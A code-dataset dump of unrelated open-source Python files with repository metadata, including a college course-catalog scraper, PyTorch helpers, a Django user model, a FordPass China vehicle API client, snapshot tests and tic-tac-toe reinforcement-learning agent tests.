elif '3:10' in start_time:
return '5/6c'
return 'Unable to determine class period'
def collect_professor(tree, course_iter):
prof = str(tree.xpath('//*[@id="enrollModule"]/div[1]/div[' + str(course_iter) + ']/div[2]/p[1]/a/text()')).replace(
'[\'', '').replace('\']', '')
if prof == '[]':
return ''
return prof
def collect_desc(tree, course_iter):
desc = str(tree.xpath('//*[@id="enrollModule"]/div[1]/div[' + str(course_iter) + ']/div[2]/p[2]/text()')).replace(
'\\xa0', ' ')
if desc == '[]':
return ''
return desc[2:-2]
# return '[under construction]'
def get_number_offered_for_term(tree):
"""
returns how many courses are offered for a certain department within a specific term
:param tree: the tree containing all HTML elements of the page currently being crawled
:return: the number of courses offered by a specific department for a specific term
"""
string = str(tree.xpath('//*[@id="enrollModule"]/p[3]/text()'))
if 'found' in string:
index = string.index('found') + 6
elif 'found' not in string:
string = str(tree.xpath('//*[@id="enrollModule"]/p[2]/text()'))
if 'found' in string:
index = string.index('found') + 6
else:
return 0
number_offered = int(''.join(filter(lambda x: x.isdigit(), string[index:index + 2])))
return number_offered
def create_csv(course_list):
"""
Creates the CSV file containing all courses offered at Carleton for the 2019-2020 school year
:param course_list: list of all courses offered at Carleton, containing Course objects
:return: None, but writes a CSV file
"""
with open('presentation_courses.csv', 'w') as csvfile:
filewriter = csv.writer(csvfile, delimiter=',', quoting=csv.QUOTE_MINIMAL)
filewriter.writerow(['Department', 'Course Number', 'Course Name', 'Term', 'Liberal Arts Requirements',
'Class Period', 'Professor', 'Description'])
for item in course_list:
filewriter.writerow(
[item.dept, item.num, item.name, item.term, item.reqs, item.periods, item.prof, item.desc])
def crawl_page(page, dept_iter, term_iter):
"""
Crawls a specific page on Carleton's ENROLL tool
:param page: the current page from Carleton ENROLL
:param dept_iter: iterative variable representing which department is currently being crawled
:param term_iter: iterative variable representing which term is currently being crawled
:return: None
"""
tree = fromstring(page.content)
num_courses = get_number_offered_for_term(tree)
# iterates through a department during a specific term
for i in range(1, num_courses + 1):
course = Course(collect_dept(dept_iter), collect_nums(tree, i), collect_name(tree, i), collect_terms(term_iter),
collect_reqs(tree, i), collect_period(tree, i), collect_professor(tree, i), collect_desc(tree, i))
master_list.append(course)
def crawl_department(dept_iter):
"""
Crawls a specific department's offerings for the year at Carleton
:param dept_iter: iterative variable representing the location within list:departments to retrieve the current dept
:return: None
"""
# iterates over all three terms
for j in range(0, 3):
term = terms[j]
url = 'https://apps.carleton.edu/campus/registrar/schedule/enroll/?term=' + term + '&subject=' + departments[
dept_iter]
page = requests.get(url)
crawl_page(page, dept_iter, j)
def main():
"""
Main method for WebCrawler2.py
Executes a web crawl over all departments for all three terms during the 2019-2020 school year
:return: none
"""
for i in range(0, len(departments)):
crawl_department(i)
create_csv(master_list)
if __name__ == '__main__':
main()
| [
"brownc2@carleton.edu"
] | brownc2@carleton.edu |
d2f8a19b3de851ef689fddf518cebea8c37b91ec | 17fe32a70be82d9fd6c3268b840226b5567c8b29 | /torchtuples/utils.py | bb86e8e2b7557ada3baedd86a27b975d4f3b2644 | [
"MIT",
"BSD-2-Clause"
] | permissive | georgehc/dksa | dbb7161a75b8206d3d469bb5b966ed7a0f84d86c | bcd9eab6c9ded47f5b166cf1351b06e26e0c8f90 | refs/heads/master | 2023-08-02T06:15:12.472386 | 2021-10-01T17:47:25 | 2021-10-01T17:47:25 | 282,355,975 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,855 | py | import time
import random
import numpy as np
import torch
from torchtuples import tuplefy, TupleTree
def make_name_hash(name='', file_ending='.pt'):
year, month, day, hour, minute, second = time.localtime()[:6]
ascii_letters_digits = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
random_hash = ''.join(random.choices(ascii_letters_digits, k=20))
path = f"{name}_{year}-{month}-{day}_{hour}-{minute}-{second}_{random_hash}{file_ending}"
return path
class TimeLogger:
def __init__(self, start=None):
self.start = self.time() if start is None else start
self.prev = self.start
@staticmethod
def time():
return time.time()
def diff(self):
prev, self.prev = (self.prev, self.time())
return self.prev - self.start, self.prev - prev
@staticmethod
def _hms_from_sec(sec):
"""Hours, minutes, seconds."""
m, s = divmod(sec, 60)
h, m = divmod(m, 60)
return h, m, s
@staticmethod
def _hms_str(h, m, s, shorten=True):
"""Hours, minutes, seconds."""
hs = f"{int(h)}h:"
ms = f"{int(m)}m:"
ss = f"{int(s)}s"
if shorten:
if h == 0:
hs = ''
if m == 0:
ms = ''
return f"{hs}{ms}{ss}"
# return f"{int(h)}h:{int(m)}m:{int(s)}s"
def hms_diff(self, shorten=True):
diff_start, diff_prev = self.diff()
hms_start = self._hms_from_sec(diff_start)
hms_prev = self._hms_from_sec(diff_prev)
return self._hms_str(*hms_start, shorten), self._hms_str(*hms_prev, shorten)
def array_or_tensor(tensor, numpy, input):
"""Returs a tensor if numpy is False or input is tensor.
Else it returns numpy array, even if input is a DataLoader.
"""
is_tensor = None
if numpy is False:
is_tensor = True
elif (numpy is True) or is_dl(input):
is_tensor = False
elif not (is_data(input) or is_dl(input)):
raise ValueError(f"Do not understand type of `input`: {type(input)}")
elif tuplefy(input).type() is torch.Tensor:
is_tensor = True
elif tuplefy(input).type() is np.ndarray:
is_tensor = False
else:
raise ValueError("Something wrong")
if is_tensor:
tensor = tuplefy(tensor).to_tensor().val_if_single()
else:
tensor = tuplefy(tensor).to_numpy().val_if_single()
return tensor
def is_data(input):
"""Returns True if `input` is data of type tuple, list, TupleTree, np.array, torch.Tensor."""
datatypes = [np.ndarray, torch.Tensor, tuple, list, TupleTree]
return any([isinstance(input, ct) for ct in datatypes])
def is_dl(input):
"""Returns True if `input` is a DataLoader (inherit from DataLoader)."""
return isinstance(input, torch.utils.data.DataLoader)
| [
"georgechen@cmu.edu"
] | georgechen@cmu.edu |
ab3cf183492b72d65e67edb8536855e59cb7a7a9 | 0c56fadfb966af74464f446d2be76fd0aeef3622 | /apps/accounts/models.py | aa66c193408c32f873c18541d188c0ba997c38f7 | [] | no_license | Lh4cKg/adoption | 847d195b8b1e70a18b5c9d5e68137672381e39b5 | c28fd09d07f35f0ce22749c447bc637fd474fafb | refs/heads/master | 2020-03-11T03:44:19.643285 | 2018-04-19T12:26:26 | 2018-04-19T12:26:26 | 129,756,984 | 0 | 0 | null | 2018-04-16T14:33:42 | 2018-04-16T14:33:42 | null | UTF-8 | Python | false | false | 2,263 | py | from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager
class MyUserManager(BaseUserManager):
use_in_migrations = True
# python manage.py createsuperuser
def create_superuser(self, email, is_staff, password):
user = self.model(
email = email,
is_staff = is_staff,
)
user.set_password(password)
user.save(using=self._db)
return user
class UserModel(AbstractBaseUser):
sys_id = models.AutoField(primary_key=True, blank=True)
nickname = models.CharField(max_length = 17, blank = False, null= False)
location = models.CharField(max_length = 17, blank = False, null= False)
first_name = models.CharField(max_length = 255, blank= False, null = False)
last_name = models.CharField(max_length = 255, blank= False, null = False)
email = models.EmailField(max_length=127, unique=True, null=False, blank=False)
is_staff = models.BooleanField(default = False)
is_active = models.BooleanField(default=True)
slug = models.SlugField(null = True, blank = True)
objects = MyUserManager()
USERNAME_FIELD = "email"
# REQUIRED_FIELDS must contain all required fields on your User model,
# but should not contain the USERNAME_FIELD or password as these fields will always be prompted for.
REQUIRED_FIELDS = ['is_staff']
class Meta:
app_label = "accounts"
db_table = "users"
def __str__(self):
return self.email
def get_full_name(self):
"""
Returns the first_name plus the last_name, with a space in between.
"""
full_name = '%s %s' %(self.first_name, self.last_name)
return full_name.strip()
def get_username(self):
return self.email
def get_short_name(self):
return self.first_name + self.last_name
# this methods are require to login super user from admin panel
def has_perm(self, perm, obj=None):
return self.is_staff
# this methods are require to login super user from admin panel
def has_module_perms(self, app_label):
return self.is_staff | [
"timaraczarko@gmail.com"
] | timaraczarko@gmail.com |
7a815792cdd656855418bc4958637547f89f5252 | 25d7db979a6575b6cccee3fe16838fc1a5892579 | /cfg.py | 294b993f6994cbd785fb16736b7eb32a0a515335 | [] | no_license | cotyb/IR-for-SDN-compiler | b0603db25b781fbd054a9563bb18a97345d7d44a | 647263e848d76ded14acc7c78bd5cacbce8d5108 | refs/heads/master | 2021-04-28T21:32:46.236850 | 2017-05-06T06:20:51 | 2017-05-06T06:20:51 | 77,768,881 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | # function = ["dpi", "nat", "count", "ftp"]
# fun_switch = {'dpi':['a', 'b'], 'nat':['c', 'd'], 'count':['j'], 'ftp':['f']}
# fun_guard_update = {'dpi':['', ''], 'nat':['', ''], 'count':['', 'rv(CNT)'], 'ftp':['']}
function = ["dpi", "nat","ftp"]
fun_switch = {'dpi':['a', 'b'], 'nat':['c', 'd'], 'ftp':['f']}
fun_guard_update = {'dpi':['', ''], 'nat':['', ''], 'ftp':['']}
header_field = ["dstip", "srcip", "srcport", "dstport"]
header_field_1 = ["ip.dst", "ip.src", "tcp.src", "tcp.dst"]
global_resource = ['bw', 'NUM'] | [
"xieleicotyb@gmail.com"
] | xieleicotyb@gmail.com |
56df3386f3c3d38d16dd134e869bf280c5836984 | d1c2de29cc94ddc6d3cfcfaa842c5e4dbddb5652 | /src/quoridor.py | bf03f4548bdfcca8c57d91257d0ef42bba7d1326 | [] | no_license | marmelab/quoridor-python | 09b02fd9db5980e46c2a7250763f2b8b9a1c221c | e76c51d00b1a228aea5b58798be427bcdecd7794 | refs/heads/master | 2023-06-05T19:37:00.759435 | 2020-05-11T11:40:03 | 2020-05-11T11:40:03 | 191,528,919 | 0 | 1 | null | 2019-06-18T10:51:49 | 2019-06-12T08:21:32 | Python | UTF-8 | Python | false | false | 120 | py | import game
def main():
pawns = game.init_game()
game.progress(pawns)
if __name__ == "__main__":
main()
| [
"matthieu.chaffotte@gmail.com"
] | matthieu.chaffotte@gmail.com |
f3e9c32e44bf0d6c8eecdc1fd66d8f7071c82827 | 7d8588cb855ca9039ed6eced402975274ad578a0 | /custom_components/fordpass_china/fordpass.py | cf44d16a6247ab278506d45c8e3bdd27af85b8b7 | [
"MIT"
] | permissive | my7hcry/fordpass_china | a9e3c14c602c14d2b4ffc3e787353bfa93c6f31f | 07268780c4044ba552166819f3c4ea11b4bcc3e3 | refs/heads/main | 2023-06-30T09:46:20.277115 | 2021-07-16T14:36:12 | 2021-07-16T14:36:12 | 393,597,119 | 0 | 0 | MIT | 2021-08-07T06:12:24 | 2021-08-07T06:12:24 | null | UTF-8 | Python | false | false | 7,980 | py | import time
import json
import logging
import requests
from .const import (
SSO_URL,
CV_URL,
API_URL,
CLIENT_ID,
DEFAULT_HEADERS,
API_HEADERS
)
_LOGGER = logging.getLogger(__name__)
class FordPass(object):
def __init__(self, username, password):
self._username = username
self._password = password
self._token = None
self._refresh_token = None
self._expires = None
def auth(self):
self._token = None
self._refresh_token = None
self._expires = None
data = {
"client_id": CLIENT_ID,
"grant_type": "password",
"username": self._username,
"password": self._password,
}
headers = {
**DEFAULT_HEADERS,
"Content-Type": "application/x-www-form-urlencoded",
}
try:
r = requests.post(
f"{SSO_URL}/oidc/endpoint/default/token",
data=data,
headers=headers,
timeout=5
)
if r.status_code == 200:
result = r.json()
data = {"code": result["access_token"]}
r = requests.put(
f"{API_URL}api/oauth2/v1/token",
data=json.dumps(data),
headers=API_HEADERS,
timeout=5
)
if r.status_code == 200:
result = r.json()
self._token = result["access_token"]
self._refresh_token = result["refresh_token"]
self._expires = time.time() + result["expires_in"] - 100
except requests.exceptions.RequestException:
_LOGGER.debug(f"Timed out when auth")
return self._token is not None
def refresh_token(self):
data = {"refresh_token": self._refresh_token}
try:
r = requests.put(
f"{API_URL}api/oauth2/v1/refresh",
data=json.dumps(data),
headers=API_HEADERS,
timeout=5
)
if r.status_code == 200:
result = r.json()
self._token = result["access_token"]
self._refresh_token = result["refresh_token"]
self._expires = time.time() + result["expires_in"] - 100
elif r.status_code == 401:
self.auth()
else:
_LOGGER.debug(f"Got unexpected status code when refresh token - {r.status_code}")
except requests.exceptions.RequestException:
_LOGGER.debug(f"Timed out when refresh token")
def check_token(self):
if self._expires:
if time.time() > self._expires:
self.refresh_token()
else:
self.auth()
return self._token is not None
def get_user_info(self):
result = None
if self.check_token():
params = {"lrdt": "01-01-1970 00:00:00"}
headers = {
**API_HEADERS,
"auth-token": self._token
}
try:
r = requests.get(
f"{CV_URL}api/users", params=params, headers=headers, timeout=5
)
if r.status_code == 200:
result = r.json()
else:
_LOGGER.debug(f"Got unexpected status code when get user info - {r.status_code}")
except requests.exceptions.RequestException:
_LOGGER.debug(f"Timed out when get user info")
return result
def get_vehicles(self):
result = None
if self.check_token():
params = {
"language": "ZH",
"region": "CN",
"country": "CHN",
}
headers = {
**API_HEADERS,
"auth-token": self._token
}
try:
r = requests.get(
f"{API_URL}api/dashboard/v1/users/vehicles",
params=params,
headers=headers,
timeout=5
)
if r.status_code == 200:
result = r.json()
else:
_LOGGER.debug(f"Got unexpected status code when get vehicles - {r.status_code}")
except requests.exceptions.RequestException:
_LOGGER.debug(f"Timed out when get vehicles")
return result
def get_vehicle_status(self, vin):
result = None
if self.check_token():
params = {"lrdt": "01-01-1970 00:00:00"}
headers = {
**API_HEADERS,
"auth-token": self._token
}
try:
r = requests.get(
f"{CV_URL}api/vehicles/v4/{vin}/status",
params=params,
headers=headers,
timeout=5
)
if r.status_code == 200:
result = r.json()
else:
_LOGGER.debug(f"Got unexpected status code when get vehicle status - {r.status_code}")
except requests.exceptions.RequestException:
_LOGGER.debug(f"Timed out when get vehicle status")
return result
def _send_command(self, opt, url):
if self.check_token():
headers = {
**API_HEADERS,
"auth-token": self._token
}
try:
r = getattr(requests, opt)(url, headers=headers, timeout=5)
if r.status_code == 200:
rjson = r.json()
if rjson["status"] == 200:
return rjson["commandId"]
else:
_LOGGER.debug(f"Got unexpected status code when {opt} {url} - {rjson}")
except requests.exceptions.RequestException as e:
_LOGGER.debug(f"Timed out when {opt} {url}")
return None
def _send_check_command(self, url):
if self.check_token():
headers = {
**API_HEADERS,
"auth-token": self._token
}
try:
r = requests.get(url, headers=headers, timeout=5)
if r.status_code == 200:
rjson = r.json()
if rjson["status"] == 200:
return True
elif rjson["status"] != 552: # pending
pass
else:
_LOGGER.debug(f"Got unexpected status code when get {url} - {rjson}")
except requests.exceptions.RequestException:
_LOGGER.debug(f"Timed out when get {url} ")
return False
def lock_doors(self, vin):
return self._send_command("put", f"{CV_URL}api/vehicles/v2/{vin}/doors/lock")
def unlock_doors(self, vin):
return self._send_command("delete", f"{CV_URL}api/vehicles/v2/{vin}/doors/lock")
def start_engine(self, vin):
return self._send_command("put", f"{CV_URL}api/vehicles/v2/{vin}/engine/start")
def stop_engine(self, vin):
return self._send_command("delete", f"{CV_URL}api/vehicles/v2/{vin}/engine/start")
def check_lock(self, vin, command_id):
return self._send_check_command(f"{CV_URL}api/vehicles/v2/{vin}/doors/lock/{command_id}")
def check_engine(self, vin, command_id):
return self._send_check_command(f"{CV_URL}api/vehicles/v2/{vin}/engine/start/{command_id}") | [
"noreply@github.com"
] | noreply@github.com |
a9a44cb9da81256da9932be1d7d4fdfa9d7ef260 | eccdc3563ff80957cc24e5ff35f4e3c2fc173c5b | /sirius/coding/test_image_coding_snapshots.py | d6e920a638a556559b41d06402868fc4a2eb7e67 | [] | no_license | nordprojects/sirius | c8c420ba5082c443fd14443128be30dda34541f4 | 9d88c63a0fc17d4acc5ae12194b93f8591e35a55 | refs/heads/main | 2023-07-08T12:40:26.407049 | 2023-07-07T15:47:55 | 2023-07-07T15:47:55 | 116,666,765 | 41 | 23 | null | 2023-07-07T15:47:56 | 2018-01-08T11:10:48 | Python | UTF-8 | Python | false | false | 1,425 | py | import os
import datetime
from tempfile import TemporaryDirectory
from PIL import Image
import snapshottest
from snapshottest.file import FileSnapshot
from sirius.coding import image_encoding
from sirius.coding import templating
class ImageCodingSnapshotCase(snapshottest.TestCase):
def _check_html(self, name, html):
print('Cheking fixture named: %s' % name)
with TemporaryDirectory() as tmpdir:
data = image_encoding.html_to_png(html)
image = Image.open(data)
temp_file_name = os.path.join(tmpdir, '%s.png' % name)
image.save(temp_file_name, format='PNG')
self.assertMatchSnapshot(FileSnapshot(temp_file_name), name)
def test_snapshot_fixtures(self):
fixtures = {
'hello_world': '<html><body>Hello, world!</body></html>',
}
for name, html in fixtures.items():
self._check_html(name, html)
def test_snapshot_template_fixtures(self):
fixtures = {
'hello_world': '<p>Hello, world!</p>',
}
fixture_username = 'somebody'
fixture_date = datetime.datetime(2012, 2, 3, 15, 46, 12)
for name, snippet in fixtures.items():
self._check_html(
name, templating.default_template(
snippet,
fixture_username,
fixture_date
)
) | [
"notjosh@gmail.com"
] | notjosh@gmail.com |
c21202a66c452dff01039f8b67e27e7865f8a7b5 | 0fdd56fd597b696508deb057903c1e214fedff99 | /machine_learing_games/Agents/LearningAgents/TestAgentsIn9FieldTicTacToe.py | ab94a1899bac1733d1b4eb78aaf501a595749026 | [] | no_license | blackicetee/Python | 297f90e473291ea7a15cd754fb6ff8bc19a2f8fd | e7ff497394dfa096fc79ac4f63a0bf05abc1b287 | refs/heads/master | 2021-01-13T13:41:56.510489 | 2017-03-19T18:08:57 | 2017-03-19T18:08:57 | 76,386,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,395 | py | import unittest
from machine_learing_games.Agents import HeuristicSearchAgentTicTacToe
from machine_learing_games.Agents import RandomAgent
from machine_learing_games.Agents.LearningAgents.TicTacToeTDQLearningAgent import TicTacToeTDQLearningAgent, \
TICTACTOE_3x3_TDQ_AGENT_100_NAME, TICTACTOE_3x3_TDQ_AGENT_1000_NAME, TICTACTOE_3x3_TDQ_AGENT_10000_NAME
from machine_learing_games.tictactoe.TicTacToe import TicTacToe
class TestTDQAgent100TrainingGamesIn9FiledTicTacToe(unittest.TestCase):
def testAgainstFirstMoveRandomAgentIn100Testgames(self):
randomAgentWins = 0
tdqAgent100Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
while not ttt.is_terminal():
RandomAgent.processTicTacToeAction(ttt)
if not ttt.is_terminal():
ttt.make_move(tdqAgent100.suggestAction(ttt))
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
randomAgentWins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
tdqAgent100Wins += 1
print 'First Move random agent wins: ' + str(
randomAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
print 'Second Move TD-Q-Agent-100 wins: ' + str(
tdqAgent100Wins) + ' games against random agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent100Wins >= 50)
def testAgainstSecondMoveRandomAgentIn100Testgames(self):
randomAgentWins = 0
tdqAgent100Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
while not ttt.is_terminal():
ttt.make_move(tdqAgent100.suggestAction(ttt))
if not ttt.is_terminal():
RandomAgent.processTicTacToeAction(ttt)
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
tdqAgent100Wins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
randomAgentWins += 1
print 'Second Move random agent wins: ' + str(
randomAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
print 'First Move TD-Q-Agent-100 wins: ' + str(
tdqAgent100Wins) + ' games against random agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent100Wins >= 50)
def testAgainstFirstMoveHeuristikAgentIn100Testgames(self):
heuristicSearchAgentWins = 0
tdqAgent100Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
while not ttt.is_terminal():
HeuristicSearchAgentTicTacToe.processAction(ttt)
if not ttt.is_terminal():
ttt.make_move(tdqAgent100.suggestAction(ttt))
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
heuristicSearchAgentWins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
tdqAgent100Wins += 1
print 'First move heuristic search agent wins: ' + str(
heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
print 'Second move TD-Q-Agent-100 wins: ' + str(
tdqAgent100Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent100Wins >= 50)
def testAgainstSecondMoveHeuristikAgentIn100Testgames(self):
heuristicSearchAgentWins = 0
tdqAgent100Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent100 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_100_NAME, 3)
while not ttt.is_terminal():
action = tdqAgent100.suggestAction(ttt)
print action
ttt.make_move(action)
if not ttt.is_terminal():
HeuristicSearchAgentTicTacToe.processAction(ttt)
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
tdqAgent100Wins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
heuristicSearchAgentWins += 1
print 'Second move heuristic search agent wins: ' + str(
heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
print 'First move TD-Q-Agent-100 wins: ' + str(
tdqAgent100Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent100Wins >= 50)
class TestTDQAgent1000TrainingGamesIn9FiledTicTacToe(unittest.TestCase):
def testAgainstFirstMoveRandomAgentIn100Testgames(self):
randomAgentWins = 0
tdqAgent1000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
while not ttt.is_terminal():
RandomAgent.processTicTacToeAction(ttt)
if not ttt.is_terminal():
ttt.make_move(tdqAgent1000.suggestAction(ttt))
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
randomAgentWins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
tdqAgent1000Wins += 1
print 'First Move random agent wins: ' + str(
randomAgentWins) + ' games against TD-Q-Agent-1000 in 9 field Tic Tac Toe!'
print 'Second Move TD-Q-Agent-1000 wins: ' + str(
tdqAgent1000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent1000Wins >= 50)
def testAgainstSecondMoveRandomAgentIn100Testgames(self):
randomAgentWins = 0
tdqAgent1000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
while not ttt.is_terminal():
ttt.make_move(tdqAgent1000.suggestAction(ttt))
if not ttt.is_terminal():
RandomAgent.processTicTacToeAction(ttt)
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
tdqAgent1000Wins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
randomAgentWins += 1
print 'Second move random agent wins: ' + str(
randomAgentWins) + ' games against TD-Q-Agent-1000 in 9 field Tic Tac Toe!'
print 'First move TD-Q-Agent-1000 wins: ' + str(
tdqAgent1000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent1000Wins >= 50)
def testAgainstFirstMoveHeuristikAgentIn100Testgames(self):
heuristicSearchAgentWins = 0
tdqAgent1000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
while not ttt.is_terminal():
HeuristicSearchAgentTicTacToe.processAction(ttt)
if not ttt.is_terminal():
ttt.make_move(tdqAgent1000.suggestAction(ttt))
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
heuristicSearchAgentWins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
tdqAgent1000Wins += 1
print 'First move heuristic search agent wins: ' + str(
heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
print 'Second move TD-Q-Agent-1000 wins: ' + str(
tdqAgent1000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent1000Wins >= 50)
def testAgainstSecondMoveHeuristikAgentIn100Testgames(self):
heuristicSearchAgentWins = 0
tdqAgent1000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent1000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_1000_NAME, 3)
while not ttt.is_terminal():
action = tdqAgent1000.suggestAction(ttt)
print action
ttt.make_move(action)
if not ttt.is_terminal():
HeuristicSearchAgentTicTacToe.processAction(ttt)
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
tdqAgent1000Wins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
heuristicSearchAgentWins += 1
print 'Second move heuristic search agent wins: ' + str(
heuristicSearchAgentWins) + ' games against TD-Q-Agent-1000 in 9 field Tic Tac Toe!'
print 'First move TD-Q-Agent-1000 wins: ' + str(
tdqAgent1000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent1000Wins >= 50)
class TestTDQAgent10000TrainingGamesIn9FiledTicTacToe(unittest.TestCase):
def testAgainstFirstMoveRandomAgentIn100Testgames(self):
randomAgentWins = 0
tdqAgent10000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
while not ttt.is_terminal():
RandomAgent.processTicTacToeAction(ttt)
if not ttt.is_terminal():
ttt.make_move(tdqAgent10000.suggestAction(ttt))
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
randomAgentWins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
tdqAgent10000Wins += 1
print 'First Move random agent wins: ' + str(
randomAgentWins) + ' games against TD-Q-Agent-10000 in 9 field Tic Tac Toe!'
print 'Second Move TD-Q-Agent-10000 wins: ' + str(
tdqAgent10000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent10000Wins >= 50)
def testAgainstSecondMoveRandomAgentIn100Testgames(self):
randomAgentWins = 0
tdqAgent10000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
while not ttt.is_terminal():
ttt.make_move(tdqAgent10000.suggestAction(ttt))
if not ttt.is_terminal():
RandomAgent.processTicTacToeAction(ttt)
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
tdqAgent10000Wins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
randomAgentWins += 1
print 'Second move random agent wins: ' + str(
randomAgentWins) + ' games against TD-Q-Agent-10000 in 9 field Tic Tac Toe!'
print 'First move TD-Q-Agent-10000 wins: ' + str(
tdqAgent10000Wins) + ' games against random agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent10000Wins >= 50)
def testAgainstFirstMoveHeuristikAgentIn100Testgames(self):
heuristicSearchAgentWins = 0
tdqAgent10000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
while not ttt.is_terminal():
HeuristicSearchAgentTicTacToe.processAction(ttt)
if not ttt.is_terminal():
ttt.make_move(tdqAgent10000.suggestAction(ttt))
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
heuristicSearchAgentWins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
tdqAgent10000Wins += 1
print 'First move heuristic search agent wins: ' + str(
heuristicSearchAgentWins) + ' games against TD-Q-Agent-100 in 9 field Tic Tac Toe!'
print 'Second move TD-Q-Agent-10000 wins: ' + str(
tdqAgent10000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent10000Wins >= 50)
def testAgainstSecondMoveHeuristikAgentIn100Testgames(self):
heuristicSearchAgentWins = 0
tdqAgent10000Wins = 0
for testGameCount in range(100):
ttt = TicTacToe(3)
tdqAgent10000 = TicTacToeTDQLearningAgent(TICTACTOE_3x3_TDQ_AGENT_10000_NAME, 3)
while not ttt.is_terminal():
action = tdqAgent10000.suggestAction(ttt)
print action
ttt.make_move(action)
if not ttt.is_terminal():
HeuristicSearchAgentTicTacToe.processAction(ttt)
print ttt.printable_game_matrix()
if ttt.is_victory() and ttt.get_player_which_moved_last() == 'X':
tdqAgent10000Wins += 1
elif ttt.is_victory() and ttt.get_player_which_moved_last() == 'O':
heuristicSearchAgentWins += 1
print 'Second move heuristic search agent wins: ' + str(
heuristicSearchAgentWins) + ' games against TD-Q-Agent-10000 in 9 field Tic Tac Toe!'
print 'First move TD-Q-Agent-10000 wins: ' + str(
tdqAgent10000Wins) + ' games against heuristic search agent in 9 field Tic Tac Toe!'
self.assertTrue(tdqAgent10000Wins >= 50) | [
"blackicetee@gmx.de"
] | blackicetee@gmx.de |
